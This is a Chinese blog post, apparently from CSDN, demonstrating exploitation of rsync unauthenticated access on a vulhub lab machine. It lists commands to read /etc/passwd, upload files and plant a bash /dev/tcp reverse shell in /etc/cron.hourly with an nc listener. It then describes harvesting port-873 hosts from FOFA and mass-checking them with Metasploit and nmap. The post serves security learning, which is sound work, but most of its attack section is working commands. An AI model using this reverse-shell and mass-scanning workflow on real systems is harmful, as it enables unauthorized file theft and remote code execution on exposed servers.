测试rsync未授权访问漏洞及批量检测

于 2024-01-31 15:02:30 发布
阅读量546 收藏 4
点赞数 3
分类专栏: 网络安全 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53073183/article/details/135953844
版权

测试rsync未授权访问漏洞及批量检测

一、rsync未授权访问漏洞

端口:873

rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。

1.1 启动vulhub靶机

docker compose build
docker compose up -d

192.168.3.13:873 为本地靶机地址

1.2 判断:

rsync rsync://192.168.3.13:873
src            	src path

如果能访问到目录,那就是有,如果没提示,那就没有

注意:切换目录时,如果加斜杠,就是访问目录,如果不加斜杠,就是访问文件

读取文件:
rsync rsync://192.168.3.13:873/src/

1.3 下载文件:

rsync rsync://192.168.3.13:873/src/usr/etc/passwd ./桌面

将passwd下载到指定目录

1.4 上传文件:

 rsync -av 1.txt rsync://192.168.3.13:873/src/tmp

将当前目录的1.txt上传到目标靶机tmp目录下

1.5 反弹shell:

思路:使用定时任务来启动反弹shell

但是经过测试,靶机的crontab似乎没有安装,服务也没有启动,尝试启动服务失败,以下内容为具体操作

1.5.1 获取信息:
 rsync  rsync://192.168.3.13:873/src/etc/crontab ./cron.txt

crontab是一个定时任务,观察哪些任务可以取代

cat cron.txt
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

17 * * * * root cd / && run-parts --report /etc/cron.hourly

每小时的第17分钟,root用户会执行该目录下的所有文件

run-parts参数为执行该目录下的所有文件

这里我们将shell文件上传到该目录

1.5.2 先在本地制作文件
vim xp
/bin/bash -i >& /dev/tcp/192.168.3.12/5566 0>&1
1.5.3 给予文件操作权限
chmod +x xp
1.5.4 上传文件
rsync -av xp rsync://192.168.3.13:873/src/etc/cron.hourly
1.5.5 监听端口
nc -lvvp 5566

等待程序自动执行

但该靶机似乎没有启动crond服务,尝试启动

service start crond

也没有成功

vim也没有安装

测试结束!

二、批量检测

2.1 收集信息

在fofa上搜索873端口的主机

port="873"

用爬虫将端口信息爬取,汇总到txt文档

注意文档格式为:

127.0.0.1
127.0.0.1
127.0.0.1

不要写端口号

爬虫程序参照上一篇文章
https://blog.csdn.net/m0_53073183/article/details/135944078

2.2 metaploit批量检测

使用metaploit中的模块 auxiliary(scanner/rsync/modules_list

# 启动metaploit
msfconsole
# 使用rsync检测模块
use auxiliary/scanner/rsync/modules_list 
# 设置检测ip文件
set rhosts file:/home/kali/Desktop/1.txt
# 设置线程数为3,可以根据电脑性能修改
set threads 3
# 运行
run

有加号的说明有目录可以访问,但并不代表存在该漏洞,如果不需要输入密码直接访问,说明漏洞存在
在这里插入图片描述

2.3 nmap批量检测

nmap -p 873 -v --script rsync-list-modules -iL /home/kali/Desktop/1.txt -oN result.txt

-p 指定只扫873端口

-v 显示详细过程

–script rsync-list-modules 使用rsync模块

-iL 扫描指定文件中的ip地址

-oN 保存扫描结果到result.txt

三、结果处理

小彭爱学习
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Rsync+ssh双机同步测试及问题解决
06-21
Rsync+ssh双机同步测试及问题解决
每日漏洞 | rsync授权访问
03-12 3756
每日漏洞 | rsync授权访问
rsync 授权访问漏洞
weixin_59086772的博客
12-28 7304
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
存在漏洞rsync版本
Jiajiajiang_的博客
11-30 1225
在kali中输入命令 searchsploit rsync
rsync授权访问漏洞
Kevin's Blog
08-06 3051
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
shell脚本实现通过Rsync批量同步Windows共享的文件夹
10-01
shell脚本实现通过Rsync批量同步Windows共享的文件夹 用到了循环和数组,通过mount.cifs挂载windows共享(老服务器SMB1.0也适用) 参考我自己写的文章: ...
rsync
01-20
Rsync 一款快速增量备份工具 支持远程同步,支持上传和下载 命令: Rsync [选项] 原始位置 目标位置 -a:归档模式,递归并保留对象属性,等同于 -rlptgoD -v:显示同步过程的详细(verbose)信息 -z:在传输文件时...
cygwin 下 rsync-3.0.8安装及使用说明
11-03
演示如何在 cygwin 下安装 rsync-3.0.8,以及此工具的使用方法,以及如何使用。以及相关工具
win10下使用git配置rsync实现断点续传及增量传输
07-20
远程文件传输rsync-断点续传及增量传输,rsync实现断点续传 传送文件较大时,如果网络中断了,重传比较费时。可以考虑使用rsync命令替代scp来断点续传文件 win10下使用git配置rsync实现断点续传,解压缩后cp到git对应usr...
Rsync授权访问漏洞记录(影响范围:全版本,端口:873)
墨痕诉清风的博客
11-24 2002
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。...
授权漏洞批量扫描poc
qq_45300786的博客
08-15 2191
一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢? 这里提供2个思路 一、msf的扫描 找到 1.1、指定文件ip扫描 192.168.100.222 192.168.100.223 192.168.100.224 192.168.100.225 192.168.100.226 这样一行一行写入文本 1.2、指定网络段ip扫描 一般都是扫C段,也就是/24就行了,尽量不要去搞A(8)、B段(16),太多了 二、楼主这里提供一些批量poc import socket
应用协议漏洞-Rsync+协议+漏洞批扫
xiaoheizi的博客
07-12 558
msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/
rsync授权漏洞复现
weixin_45006525的博客
03-31 5704
漏洞简介: rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以授权读写目标服务器文件。 环境搭建: 本此环境使用docker-vulhub 进入vulhub-rsync,运行docker-compose up -d 环境搭建完成后,用nmap扫描一下,发现服务已经启动 漏洞复现 1.列出模块下的文件 2.下载任意文件 rsync r
rsync授权访问漏洞利用
weixin_47493074的博客
10-05 737
rsync授权访问漏洞利用
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1018
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
常见的授权漏洞批量检测工具
weixin_46211944的博客
06-26 863
命令行版已放出支持多线程,批量扫描,指定服务扫描,命令行版地址https://github.com/xk11z/unauthorized_com。10 、Apache Spark 授权访问(6066、8081、8082)22 、RabbitMQ 授权访问(15672、15692、25672)19 、Elasticsearch 授权访问(9200、9300)24 、NFS 授权访问(2049、20048)4 、ZooKeeper 授权访问(2181)8 、VNC 授权访问(5900、5901)
rsync 漏洞利用
最新发布
08-15
回答: 目前已经存在一些rsync漏洞,可以被攻击者利用来执行远程代码或者获取敏感信息。其中一种漏洞是在rsync服务端配置文件中,如果配置了"uid"和"gid"为root权限,并且没有启用chroot限制,则攻击者可以通过构造恶意的rsync请求来提升权限并执行恶意代码。此外,在一些版本的rsync中存在其他漏洞,攻击者可以利用这些漏洞来执行任意命令或者读取敏感文件。要防止漏洞利用,建议及时更新rsync到最新版本,并且配置合适的权限限制和访问控制,确保只有合法的用户可以访问rsync服务。另外,也应该定期审查rsync日志,以及监控系统中的异常行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [rsync 授权访问漏洞](https://blog.csdn.net/weixin_59086772/article/details/122195357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [漏洞利用——Rsync匿名访问漏洞](https://blog.csdn.net/qq_33608000/article/details/104124375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值